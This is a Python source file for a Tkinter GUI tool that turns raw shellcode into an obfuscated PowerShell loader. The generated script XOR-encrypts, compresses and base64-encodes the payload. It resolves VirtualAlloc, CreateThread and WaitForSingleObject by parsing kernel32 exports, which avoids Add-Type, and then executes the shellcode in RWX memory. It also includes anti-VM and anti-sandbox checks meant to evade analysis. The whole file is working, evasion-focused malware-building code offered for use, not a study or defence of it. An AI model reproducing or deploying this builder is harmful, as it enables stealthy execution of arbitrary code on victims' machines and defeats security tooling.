import tkinter as tk
from tkinter import filedialog, messagebox, ttk
import os
import base64
import zlib
import random
import string
import secrets

# ──────────────────────────────────────────────────────────────────────────────
#  CORE GENERATOR ENGINE V1.0.0
# ──────────────────────────────────────────────────────────────────────────────

class PS1PayloadGenerator:
    """Assembles the final PowerShell script with god-tier features (self-injection only, no Add-Type)."""

    def __init__(self, shellcode_bytes: bytes, options: dict):
        self.sc = shellcode_bytes
        self.opts = options
        self.session_marker = secrets.token_hex(4)

        # Pre-generate all unique random variables so they are identical across all templates and debug logs
        self.va_del_var = self._rand_var("vaDel")
        self.ct_del_var = self._rand_var("ctDel")
        self.wso_del_var = self._rand_var("wsoDel")
        self.va_ptr_var = self._rand_var("vaPtr")
        self.ct_ptr_var = self._rand_var("ctPtr")
        self.wso_ptr_var = self._rand_var("wsoPtr")
        self.kpath_var = self._rand_var("kpath")
        self.bytes_var = self._rand_var("kbytes")
        self.exp_rva_var = self._rand_var("expRva")
        self.base_addr_var = self._rand_var("baseAddr")
        self.e_lfanew_var = self._rand_var("elfanew")
        self.pe_sig_var = self._rand_var("peSig")
        self.exp_rva_off_var = self._rand_var("expRvaOff")
        self.opt_magic_var = self._rand_var("optMagic")
        self.func_offs_var = self._rand_var("funcOffs")
        self.name_offs_var = self._rand_var("nameOffs")
        self.ord_offs_var = self._rand_var("ordOffs")
        self.num_names_var = self._rand_var("numNames")
        self.va_invoke_var = self._rand_var("vaInv")
        self.ct_invoke_var = self._rand_var("ctInv")
        self.wso_invoke_var = self._rand_var("wsoInv")

    # --------------------------------------------------------------------------
    #  OBFUSCATION UTILS
    # --------------------------------------------------------------------------
    @staticmethod
    def _rand_var(prefix: str = "v") -> str:
        length = random.randint(6, 12)
        chars = string.ascii_letters + string.digits
        return f"{prefix}{''.join(random.choices(chars, k=length))}"

    def _xor_key(self) -> bytes:
        return secrets.token_bytes(random.randint(1, 64))

    def _compress(self, data: bytes) -> bytes:
        # Use wbits=-15 to generate a raw deflate stream (RFC 1951) without the zlib headers/footers.
        # This completely resolves the 'Block length does not match with its complement' .NET exception.
        compressor = zlib.compressobj(level=9, method=zlib.DEFLATED, wbits=-15)
        return compressor.compress(data) + compressor.flush()

    def _encrypt(self, data: bytes, key: bytes) -> bytes:
        key_len = len(key)
        return bytes(b ^ key[i % key_len] for i, b in enumerate(data))

    def _base64_encode(self, data: bytes) -> str:
        enc = base64.b64encode(data).decode("utf-8")
        chunk = random.randint(80, 200)
        return "\n".join(enc[i:i+chunk] for i in range(0, len(enc), chunk))

    # --------------------------------------------------------------------------
    #  POWERSHELL TEMPLATES
    # --------------------------------------------------------------------------
    def _header(self) -> str:
        junk = ''.join(random.choices(string.ascii_letters, k=random.randint(30, 80)))
        return f"# {junk}\n# AUTOGENERATED by corrected builder | {self.session_marker}\n"

    def _winapi_no_addtype(self) -> str:
        """
        Returns a PowerShell block that:
         - Defines delegate types via reflection emit.
         - Parses kernel32.dll exports to get function pointers.
         - Returns three delegates: $VirtualAlloc, $CreateThread, $WaitForSingleObject.
        No Add-Type. All PowerShell syntax is valid.
        """
        block = f'''
# ===== Dynamic WinAPI binding – zero Add-Type =====
$domain = [AppDomain]::CurrentDomain
$assembly = $domain.DefineDynamicAssembly((New-Object Reflection.AssemblyName("DynAsm")), [Reflection.Emit.AssemblyBuilderAccess]::Run)
$module = $assembly.DefineDynamicModule("DynMod")

# Helper function to bitwise-OR enum flags
function Get-EnumOr($e1, $e2) {{
    return [int]$e1 -bor [int]$e2
}}

# Define delegates with appropriate Sealed Class metadata attributes to comply with .NET CLI standards
$delTypeVa = $module.DefineType("{self.va_del_var}", 'Class, Public, Sealed, AnsiClass, AutoClass', [MulticastDelegate])
$ctorVa = $delTypeVa.DefineConstructor(
    [Reflection.MethodAttributes](Get-EnumOr ([Reflection.MethodAttributes]::Public) ([Reflection.MethodAttributes]::HideBySig) -bor [int][Reflection.MethodAttributes]::SpecialName -bor [int][Reflection.MethodAttributes]::RTSpecialName),
    [Reflection.CallingConventions]::Standard,
    @([Object], [IntPtr]))
$ctorVa.SetImplementationFlags( [Reflection.MethodImplAttributes]([int][Reflection.MethodImplAttributes]::Runtime -bor [int][Reflection.MethodImplAttributes]::Managed) )
${self.va_invoke_var} = $delTypeVa.DefineMethod("Invoke",
    [Reflection.MethodAttributes](Get-EnumOr ([Reflection.MethodAttributes]::Public) ([Reflection.MethodAttributes]::HideBySig) -bor [int][Reflection.MethodAttributes]::Virtual),
    [IntPtr],
    @([IntPtr], [UInt32], [UInt32], [UInt32]))
${self.va_invoke_var}.SetImplementationFlags( [Reflection.MethodImplAttributes]([int][Reflection.MethodImplAttributes]::Runtime -bor [int][Reflection.MethodImplAttributes]::Managed) )
$vaType = $delTypeVa.CreateType()

$delTypeCt = $module.DefineType("{self.ct_del_var}", 'Class, Public, Sealed, AnsiClass, AutoClass', [MulticastDelegate])
$ctorCt = $delTypeCt.DefineConstructor(
    [Reflection.MethodAttributes](Get-EnumOr ([Reflection.MethodAttributes]::Public) ([Reflection.MethodAttributes]::HideBySig) -bor [int][Reflection.MethodAttributes]::SpecialName -bor [int][Reflection.MethodAttributes]::RTSpecialName),
    [Reflection.CallingConventions]::Standard,
    @([Object], [IntPtr]))
$ctorCt.SetImplementationFlags( [Reflection.MethodImplAttributes]([int][Reflection.MethodImplAttributes]::Runtime -bor [int][Reflection.MethodImplAttributes]::Managed) )
${self.ct_invoke_var} = $delTypeCt.DefineMethod("Invoke",
    [Reflection.MethodAttributes](Get-EnumOr ([Reflection.MethodAttributes]::Public) ([Reflection.MethodAttributes]::HideBySig) -bor [int][Reflection.MethodAttributes]::Virtual),
    [IntPtr],
    @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]))
${self.ct_invoke_var}.SetImplementationFlags( [Reflection.MethodImplAttributes]([int][Reflection.MethodImplAttributes]::Runtime -bor [int][Reflection.MethodImplAttributes]::Managed) )
$ctType = $delTypeCt.CreateType()

$delTypeWso = $module.DefineType("{self.wso_del_var}", 'Class, Public, Sealed, AnsiClass, AutoClass', [MulticastDelegate])
$ctorWso = $delTypeWso.DefineConstructor(
    [Reflection.MethodAttributes](Get-EnumOr ([Reflection.MethodAttributes]::Public) ([Reflection.MethodAttributes]::HideBySig) -bor [int][Reflection.MethodAttributes]::SpecialName -bor [int][Reflection.MethodAttributes]::RTSpecialName),
    [Reflection.CallingConventions]::Standard,
    @([Object], [IntPtr]))
$ctorWso.SetImplementationFlags( [Reflection.MethodImplAttributes]([int][Reflection.MethodImplAttributes]::Runtime -bor [int][Reflection.MethodImplAttributes]::Managed) )
${self.wso_invoke_var} = $delTypeWso.DefineMethod("Invoke",
    [Reflection.MethodAttributes](Get-EnumOr ([Reflection.MethodAttributes]::Public) ([Reflection.MethodAttributes]::HideBySig) -bor [int][Reflection.MethodAttributes]::Virtual),
    [UInt32],
    @([IntPtr], [UInt32]))
${self.wso_invoke_var}.SetImplementationFlags( [Reflection.MethodImplAttributes]([int][Reflection.MethodImplAttributes]::Runtime -bor [int][Reflection.MethodImplAttributes]::Managed) )
$wsoType = $delTypeWso.CreateType()

# ---- Parse kernel32.dll exports ----
${self.kpath_var} = [Environment]::SystemDirectory + "\\kernel32.dll"
${self.bytes_var} = [IO.File]::ReadAllBytes(${self.kpath_var})
${self.e_lfanew_var} = [BitConverter]::ToInt32(${self.bytes_var}, 0x3C)
${self.pe_sig_var} = [BitConverter]::ToInt32(${self.bytes_var}, ${self.e_lfanew_var})
if (${self.pe_sig_var} -ne 0x4550) {{ throw "Invalid PE" }}

# Dynamically resolve Export Directory Offset based on 32-bit vs 64-bit Magic
${self.opt_magic_var} = [BitConverter]::ToUInt16(${self.bytes_var}, ${self.e_lfanew_var} + 0x18)
if (${self.opt_magic_var} -eq 0x20B) {{
    ${self.exp_rva_off_var} = ${self.e_lfanew_var} + 0x88
}} else {{
    ${self.exp_rva_off_var} = ${self.e_lfanew_var} + 0x78
}}
${self.exp_rva_var} = [BitConverter]::ToInt32(${self.bytes_var}, ${self.exp_rva_off_var})

# Obtain dynamic in-memory base address of loaded kernel32.dll to defeat ASLR completely
${self.base_addr_var} = ([Diagnostics.Process]::GetCurrentProcess().Modules | Where-Object {{$_.ModuleName -eq "kernel32.dll"}}).BaseAddress

function Get-RvaToFileOffset($rva) {{
    $sizeOfOptionalHeader = [BitConverter]::ToUInt16(${self.bytes_var}, ${self.e_lfanew_var} + 0x14)
    $secHeaderOff = ${self.e_lfanew_var} + 0x18 + $sizeOfOptionalHeader
    $secCount = [BitConverter]::ToUInt16(${self.bytes_var}, ${self.e_lfanew_var} + 0x6)
    for ($i = 0; $i -lt $secCount; $i++) {{
        $secOff = $secHeaderOff + ($i * 0x28)
        $virtAddr = [BitConverter]::ToUInt32(${self.bytes_var}, $secOff + 0x0C)
        $rawSize = [BitConverter]::ToUInt32(${self.bytes_var}, $secOff + 0x10)
        $rawOff = [BitConverter]::ToUInt32(${self.bytes_var}, $secOff + 0x14)
        if ($rva -ge $virtAddr -and $rva -lt ($virtAddr + $rawSize)) {{
            return $rawOff + ($rva - $virtAddr)
        }}
    }}
    return 0
}}

$expOff = Get-RvaToFileOffset(${self.exp_rva_var})
${self.num_names_var} = [BitConverter]::ToInt32(${self.bytes_var}, $expOff + 0x18)
${self.func_offs_var} = Get-RvaToFileOffset([BitConverter]::ToInt32(${self.bytes_var}, $expOff + 0x1C))
${self.name_offs_var} = Get-RvaToFileOffset([BitConverter]::ToInt32(${self.bytes_var}, $expOff + 0x20))
${self.ord_offs_var} = Get-RvaToFileOffset([BitConverter]::ToInt32(${self.bytes_var}, $expOff + 0x24))

function Get-ProcAddress($name) {{
    $nameBytes = [Text.Encoding]::ASCII.GetBytes($name)
    for ($i = 0; $i -lt ${self.num_names_var}; $i++) {{
        $nameRva = [BitConverter]::ToInt32(${self.bytes_var}, ${self.name_offs_var} + ($i * 4))
        $nameFileOff = Get-RvaToFileOffset($nameRva)
        $len = 0
        while (${self.bytes_var}[$nameFileOff + $len] -ne 0) {{ $len++ }}
        $currName = [Text.Encoding]::ASCII.GetString(${self.bytes_var}, $nameFileOff, $len)
        if ($currName -ceq $name) {{
            $ordinal = [BitConverter]::ToUInt16(${self.bytes_var}, ${self.ord_offs_var} + ($i * 2))
            $funcRva = [BitConverter]::ToInt32(${self.bytes_var}, ${self.func_offs_var} + ($ordinal * 4))
            return [IntPtr](${self.base_addr_var}.ToInt64() + $funcRva)
        }}
    }}
    throw "Export $name not found"
}}

${self.va_ptr_var} = Get-ProcAddress "VirtualAlloc"
${self.ct_ptr_var} = Get-ProcAddress "CreateThread"
${self.wso_ptr_var} = Get-ProcAddress "WaitForSingleObject"

$VirtualAlloc = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${self.va_ptr_var}, [Type]$vaType)
$CreateThread = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${self.ct_ptr_var}, [Type]$ctType)
$WaitForSingleObject = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${self.wso_ptr_var}, [Type]$wsoType)
'''
        return block

    def _decompressor(self) -> str:
        return """
        function Decompress($d) {
            $ms = New-Object IO.MemoryStream(,$d)
            $ds = New-Object IO.Compression.DeflateStream($ms,[IO.Compression.CompressionMode]::Decompress)
            $out = New-Object IO.MemoryStream
            $ds.CopyTo($out)
            $ds.Close(); $ms.Close()
            $out.ToArray()
        }
        """

    def _decryptor(self, key: bytes) -> str:
        key_b64 = base64.b64encode(key).decode("utf-8")
        key_var = self._rand_var("keyb64")
        return f"""
${key_var} = "{key_b64}"
function Decrypt($buf) {{
    $k = [Convert]::FromBase64String(${key_var})
    $r = New-Object byte[] $buf.Length
    for($i=0; $i -lt $buf.Length; $i++) {{ $r[$i] = $buf[$i] -bxor $k[$i % $k.Length] }}
    return $r
}}
"""

    def _anti_analysis(self) -> str:
        # Check if the user opted to bypass / disable anti-sandbox features
        if not self.opts.get("anti_sandbox", True):
            if self.opts.get("debug_mode", False):
                return 'Write-Host "[*] Anti-Sandbox evasion checks explicitly disabled."\n'
            return "$true"

        # Safe diagnostic logic that replaces hanging CIM / WMI calls with instantaneous direct .NET/registry calls
        if self.opts.get("debug_mode", False):
            return f"""
            Write-Host "[*] Executing Anti-Sandbox Evasion diagnostics..."
            
            Write-Host "    [1/5] Testing VM virtualization profiles (BIOS Registry)..."
            $bios = Get-ItemProperty -Path "HKLM:\\HARDWARE\\DESCRIPTION\\System\\BIOS" -ErrorAction SilentlyContinue
            $model = "$($bios.SystemProductName) $($bios.SystemManufacturer)"
            if ($model -match 'Virtual|VMware|VirtualBox|Xen|KVM') {{
                Write-Host "    [-] Diagnostic failure: Virtualization footprint detected ('$model')"
                Read-Host -Prompt "Press Enter to exit..."
                exit
            }}
            
            Write-Host "    [2/5] Checking target disk footprint capacity (.NET DriveInfo)..."
            $disk = [System.IO.DriveInfo]::GetDrives() | Where-Object {{ $_.Name -eq "C:\\" }} | Select-Object -ExpandProperty TotalSize
            if ($disk -le 60GB) {{
                Write-Host "    [-] Diagnostic failure: Disk space too narrow ($([Math]::Round($disk/1GB, 2)) GB available, target > 60GB)"
                Read-Host -Prompt "Press Enter to exit..."
                exit
            }}
            
            Write-Host "    [3/5] Inspecting host processing core count (.NET Environment)..."
            $cores = [Environment]::ProcessorCount
            if ($cores -lt 2) {{
                Write-Host "    [-] Diagnostic failure: Processor restricts execution to single core ($cores core)"
                Read-Host -Prompt "Press Enter to exit..."
                exit
            }}
            
            Write-Host "    [4/5] Counting physical RAM buffer sizes (.NET ComputerInfo)..."
            [void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.VisualBasic")
            $ram = (New-Object Microsoft.VisualBasic.Devices.ComputerInfo).TotalPhysicalMemory
            if ($ram -le 2GB) {{
                Write-Host "    [-] Diagnostic failure: Low system memory ($([Math]::Round($ram/1GB, 2)) GB available, target > 2GB)"
                Read-Host -Prompt "Press Enter to exit..."
                exit
            }}
            
            Write-Host "    [5/5] Checking boot threshold times (TickCount Uptime)..."
            $uptime = [TimeSpan]::FromMilliseconds([Environment]::TickCount)
            if ($uptime -lt (New-TimeSpan -Minutes 15)) {{
                Write-Host "    [-] Diagnostic failure: VM recently spun up ($([Math]::Round($uptime.TotalMinutes, 2)) minutes, target > 15m)"
                Read-Host -Prompt "Press Enter to exit..."
                exit
            }}
            Write-Host "[+] All Anti-Sandbox evasion checks passed successfully!"
            """
        else:
            # Silent, non-blocking single-liner statements utilizing registry paths and high-performance framework queries
            checks = [
                r'((Get-ItemProperty -Path "HKLM:\HARDWARE\DESCRIPTION\System\BIOS" -ErrorAction SilentlyContinue).SystemProductName + (Get-ItemProperty -Path "HKLM:\HARDWARE\DESCRIPTION\System\BIOS" -ErrorAction SilentlyContinue).SystemManufacturer -notmatch "Virtual|VMware|VirtualBox|Xen|KVM")',
                r'(([System.IO.DriveInfo]::GetDrives() | Where-Object { $_.Name -eq "C:\" } | Select-Object -ExpandProperty TotalSize) -gt 60GB)',
                r'([Environment]::ProcessorCount -ge 2)',
                r'([void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.VisualBasic") -or (New-Object Microsoft.VisualBasic.Devices.ComputerInfo).TotalPhysicalMemory -gt 2GB)',
                r'([TimeSpan]::FromMilliseconds([Environment]::TickCount) -gt (New-TimeSpan -Minutes 15))'
            ]
            return " -and ".join(f"({c})" for c in checks)

    def _injector(self, sc_var: str) -> str:
        addr_var = self._rand_var("addr")
        if self.opts.get("debug_mode", False):
            return f"""
            try {{
                Write-Host "[*] Invoking VirtualAlloc to allocate memory payload..."
                ${addr_var} = $VirtualAlloc.Invoke(0, ${sc_var}.Length, 0x3000, 0x40)
                if (-not ${addr_var} -or ${addr_var} -eq [IntPtr]::Zero) {{
                    Write-Host "[-] VirtualAlloc failed to allocate memory space!"
                    Read-Host -Prompt "Press Enter to exit..."
                    exit
                }}
                Write-Host "[+] Allocated execution space at: 0x$(${addr_var}.ToString('X'))"
                
                Write-Host "[*] Copying payload into RWX memory space..."
                [Runtime.InteropServices.Marshal]::Copy(${sc_var}, 0, ${addr_var}, ${sc_var}.Length)
                Write-Host "[+] Payload byte copy operations completed."
                
                Write-Host "[*] Executing CreateThread inside current process..."
                $h = $CreateThread.Invoke(0, 0, ${addr_var}, 0, 0, 0)
                if (-not $h -or $h -eq [IntPtr]::Zero) {{
                    Write-Host "[-] Thread creation failed."
                    Read-Host -Prompt "Press Enter to exit..."
                    exit
                }}
                Write-Host "[+] Thread started successfully! Handle: $h"
                
                Write-Host "[*] Waiting for single thread completion signal (blocking)..."
                $res = $WaitForSingleObject.Invoke($h, [uint32]::MaxValue)
                Write-Host "[+] Thread finalized. Execution code: $res"
                Read-Host -Prompt "Press Enter to exit..."
            }} catch {{
                Write-Error $_
                Read-Host -Prompt "Press Enter to exit (caught fatal exception)..."
            }}
            """
        else:
            return f"""
            ${addr_var} = $VirtualAlloc.Invoke(0, ${sc_var}.Length, 0x3000, 0x40)
            [Runtime.InteropServices.Marshal]::Copy(${sc_var}, 0, ${addr_var}, ${sc_var}.Length)
            $h = $CreateThread.Invoke(0, 0, ${addr_var}, 0, 0, 0)
            $WaitForSingleObject.Invoke($h, [uint32]::MaxValue) | Out-Null
            """

    def build(self) -> str:
        compressed = self._compress(self.sc)
        xor_key = self._xor_key()
        encrypted = self._encrypt(compressed, xor_key)
        payload_b64 = self._base64_encode(encrypted)

        sc_b64_var = self._rand_var("b64payload")
        sc_raw_var = self._rand_var("raw")

        script = self._header()
        
        if self.opts.get("debug_mode", False):
            script += "\nWrite-Host '[*] Initializing runner operations...'\n"
            script += "Write-Host '[*] Launching dynamic API resolving mechanisms...'\n"

        script += self._winapi_no_addtype()

        if self.opts.get("debug_mode", False):
            script += f"Write-Host '[+] DLL Export parsing completed! Loaded Addresses:'\n"
            script += f"Write-Host '    VirtualAlloc -> 0x' ${self.va_ptr_var}.ToString('X')\n"
            script += f"Write-Host '    CreateThread -> 0x' ${self.ct_ptr_var}.ToString('X')\n"
            script += f"Write-Host '    WaitForSingleObject -> 0x' ${self.wso_ptr_var}.ToString('X')\n"

        anti = self._anti_analysis()
        if self.opts.get("debug_mode", False):
            script += anti
        else:
            if anti != "$true":
                script += f"\nif (-not ({anti})) {{ exit }}\n"

        script += self._decryptor(xor_key)
        script += self._decompressor()

        script += f"\n${sc_b64_var} = @\"\n{payload_b64}\n\"@\n"
        
        if self.opts.get("debug_mode", False):
            script += "Write-Host '[*] Unpacking compressed and encrypted binary base64 string...'\n"

        script += f"\n${sc_raw_var} = Decompress (Decrypt ([Convert]::FromBase64String(${sc_b64_var})))\n"

        if self.opts.get("debug_mode", False):
            script += f"Write-Host '[+] Extraction completed! Dynamic byte size: ' ${sc_raw_var}.Length 'bytes'\n"

        script += self._injector(sc_raw_var)
        return script


# ──────────────────────────────────────────────────────────────────────────────
#  GRAPHICAL USER INTERFACE
# ──────────────────────────────────────────────────────────────────────────────

class GodTierBuilderApp:
    """Tkinter application for generating the PS1 payload (self-injection)."""

    def __init__(self, root):
        self.root = root
        self.root.title("Shellcode → God-Tier PS1 Generator")
        self.root.geometry("650x480")
        self.root.resizable(False, False)

        style = ttk.Style()
        style.configure("TButton", padding=6)
        style.configure("TLabel", padding=4)

        self.shellcode_path = tk.StringVar()
        self.output_path = tk.StringVar()
        self.anti_sandbox = tk.BooleanVar(value=True)
        self.debug_mode = tk.BooleanVar(value=False)

        self.build_ui()

    def build_ui(self):
        frame1 = ttk.LabelFrame(self.root, text="1. Shellcode File (.bin)", padding=10)
        frame1.pack(fill="x", padx=10, pady=5)
        ttk.Entry(frame1, textvariable=self.shellcode_path, width=50).pack(side="left", padx=5)
        ttk.Button(frame1, text="Browse", command=self.browse_shellcode).pack(side="left")

        frame2 = ttk.LabelFrame(self.root, text="2. Output PS1 File", padding=10)
        frame2.pack(fill="x", padx=10, pady=5)
        ttk.Entry(frame2, textvariable=self.output_path, width=50).pack(side="left", padx=5)
        ttk.Button(frame2, text="Browse", command=self.browse_output).pack(side="left")

        frame3 = ttk.LabelFrame(self.root, text="3. Evasion & Technical Features", padding=10)
        frame3.pack(fill="x", padx=10, pady=5)
        ttk.Checkbutton(frame3, text="Anti-VM / Sandbox checks", variable=self.anti_sandbox).grid(row=0, column=0, sticky="w")
        ttk.Checkbutton(frame3, text="Enable Verbose Debug Output (Diagnostics)", variable=self.debug_mode).grid(row=1, column=0, sticky="w", pady=2)
        ttk.Label(frame3, text="Injection method: Self (current process) – hardcoded").grid(row=2, column=0, sticky="w", pady=2)
        ttk.Label(frame3, text="WinAPI binding: Dynamic export parsing (NO Add-Type)").grid(row=3, column=0, sticky="w", pady=2)

        ttk.Button(self.root, text="⚡ GENERATE GOD-TIER PS1 ⚡", command=self.generate).pack(pady=20)

        self.status = ttk.Label(self.root, text="Ready")
        self.status.pack()

    def browse_shellcode(self):
        filename = filedialog.askopenfilename(filetypes=[("Binary files", "*.bin"), ("All files", "*.*")])
        if filename:
            self.shellcode_path.set(filename)
            base = os.path.splitext(filename)[0]
            self.output_path.set(base + "_godtier_selfinject_noAddType.ps1")

    def browse_output(self):
        filename = filedialog.asksaveasfilename(defaultextension=".ps1", filetypes=[("PowerShell scripts", "*.ps1")])
        if filename:
            self.output_path.set(filename)

    def generate(self):
        sc_path = self.shellcode_path.get()
        out_path = self.output_path.get()
        if not sc_path or not os.path.isfile(sc_path):
            messagebox.showerror("Error", "Please select a valid shellcode file.")
            return
        if not out_path:
            messagebox.showerror("Error", "Output file path is required.")
            return
        fsize = os.path.getsize(sc_path)
        if fsize > 20 * 1024 * 1024:
            messagebox.showerror("Error", f"Shellcode too large: {fsize/1024/1024:.2f} MB. Max 20 MB.")
            return

        try:
            with open(sc_path, "rb") as f:
                shellcode = f.read()
        except Exception as e:
            messagebox.showerror("File Read Error", str(e))
            return

        # Warning user if they imported a compiled PE binary (EXE/DLL) instead of raw shellcode bytes
        if len(shellcode) >= 2 and shellcode[:2] == b'MZ':
            warn_msg = (
                "Executable Header (MZ) Detected!\n\n"
                "The selected file appears to be a Windows executable (.exe) instead of raw, position-independent shellcode.\n\n"
                "Running an .exe directly as shellcode will cause immediate silent crashes.\n\n"
                "Do you want to continue generation anyway?"
            )
            if not messagebox.askyesno("Warning: Invalid Payload Type", warn_msg):
                return

        options = {
            "anti_sandbox": self.anti_sandbox.get(),
            "debug_mode": self.debug_mode.get()
        }

        self.status.config(text="Building payload...")
        self.root.update()

        try:
            gen = PS1PayloadGenerator(shellcode, options)
            final_script = gen.build()
            with open(out_path, "w", encoding="utf-8") as f:
                f.write(final_script)
            self.status.config(text=f"Success! Written to {out_path}")
            messagebox.showinfo("Done", f"God-Tier PS1 payload saved to:\n{out_path}")
        except Exception as e:
            messagebox.showerror("Generation Failed", str(e))
            self.status.config(text="Error occurred")


# ──────────────────────────────────────────────────────────────────────────────
#  ENTRY POINT
# ──────────────────────────────────────────────────────────────────────────────
if __name__ == "__main__":
    root = tk.Tk()
    app = GodTierBuilderApp(root)
    root.mainloop()
